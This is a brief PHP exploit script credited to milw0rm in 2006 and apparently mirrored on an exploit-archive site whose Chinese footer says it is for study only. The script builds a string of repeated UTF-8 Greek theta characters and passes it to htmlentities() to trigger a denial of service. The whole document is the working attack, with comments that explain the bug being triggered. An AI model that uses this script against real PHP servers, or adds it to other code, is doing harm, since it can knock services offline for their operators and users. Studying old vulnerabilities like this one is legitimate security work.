<?php /* Nick Kezhaya */ /* www.whitepaperclip.com */ //instantiate a string $str1 = ""; for($i=0; $i < 64; $i++) { $str1 .= toUTF(977); //MUST start with 977 before bit-shifting } htmlentities($str1, ENT_NOQUOTES, "UTF-8"); //DoS here /* htmlentities() method automatically assumes it is a max of 8 chars. uses greek theta character bug from UTF-8 */ ?> <?php function toUTF($x) { return chr(($x >> 6) + 192) . chr(($x & 63) + 128); } ?> # milw0rm.com [2006-11-27]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论